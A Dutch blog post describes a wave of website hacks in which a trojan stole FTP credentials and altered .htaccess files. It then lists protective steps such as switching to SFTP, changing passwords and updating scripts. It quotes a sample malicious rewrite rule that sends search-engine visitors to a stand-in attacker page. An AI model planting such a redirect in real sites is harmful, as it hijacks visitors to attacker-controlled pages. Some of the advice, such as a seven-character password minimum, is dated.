Sinds enkele weken is er een buzz op het internet over websites die gehackt kunnen worden zonder ook maar een spoor van een mogelijke aanval achter te laten. Iedere webdeveloper zat toen wel even op het puntje van zijn stoel met zijn vingers gekruist in de hoop dat hij niet het volgende slachtoffer zou worden. Stel je voor dat een hacker gemakkelijk zonder een spoor achter te laten eender welke website kon hacken of blootstellen.

Het eerste teken van een hack wat we konden terugvinden op de servers was dat het .htaccess bestand was aangepast. Hierin stonden enkele regels code die bezoekers, die via een zoekmachine op de website terecht kwamen, doorverwezen naar een pagina van de hacker.

Deze rewrite code kan er als volgt uitzien:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR] 
RewriteRule .* http://hacker.xx/in.html?= [R,L] 

Hoe de hackers te werk gingen wist toen nog niemand en ook met googelen geraakte je geen stap verder. Je moest dus zelf uitzoeken hoe dit probleem werd veroorzaakt. Het beste wat je kon doen was al je FTP wachtwoorden veranderen en je PC scannen op virussen. Dit was natuurlijk geen veilige oplossing want als een hacker één keer zonder wachtwoord op je server geraakt zal dat gerust nog wel een 2de keer lukken.

Nu zijn we enkele dagen verder en zijn er al tientallen blogposts op het internet te vinden over hoe dit heeft kunnen gebeuren en hoe je dit probleem kan voorkomen in de toekomst. De oorzaak is een trojan virus wat op je pc staat en zichzelf toegang verleent tot je FTP accounts (bron: unmaskparasites). Omdat waarschijnlijk niet iedereen alle technische details wil weten leg ik dit in enkele stappen even uit hoe je je website snel kan beschermen tegen deze hack.

1. Controleer eerst of je website gehackt is. Dat kan via de UnmaskParasites website.
2. Gebruik SFTP om in te loggen in plaats van FTP, FTP stuurt namelijk alle data in leesbare tekst door, SFTP zal de verzonden data encrypten waardoor het moeilijker is voor hackers om deze gevoelige data te achterhalen.
3. Verander je FTP wachtwoorden, zorg voor een sterk wachtwoord. Minstens 7 karakters is aangeraden
4. Zorg ervoor dat mappen chmod 755 hebben en bestanden 644 rechten hebben. Zo zorg je ervoor dat hackers geen bestanden kunnen aanpassen via exploits in webapplicaties.
5. Update je scripts regelmatig. De programmeurs van Wordpress, PhpBB en andere scripts geven geregeld updates van hun systeem uit, maak hier zeker gebruik van. Zo ben je zeker dat je website beschermd is tegen mogelijk oudere bugs of lekken in het systeem.

Wat je zeker niet mag vergeten is dat vele scripts open source zijn. Iedereen kan de code achter Wordpress, PhpBB, etc ... bekijken en mogelijke zwakke punten uitbuiten. De boodschap is dus: wees altijd op je hoede als je belangrijke websites op deze open source applicaties laat draaien.

Met dank aan @combell voor een snelle oplossing van deze hack en @maartenMachiels voor de extra informatie!

Meer informatie over deze hack:

• http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/
• http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
• http://blog.unmaskparasites.com/2009/04/29/another-type-of-iframe-hack-php-exploit/
• http://www.pcadvisor.co.uk/news/index.cfm?newsid=12422
• http://blog.trendmicro.com/another-malware-pulls-an-italian-job/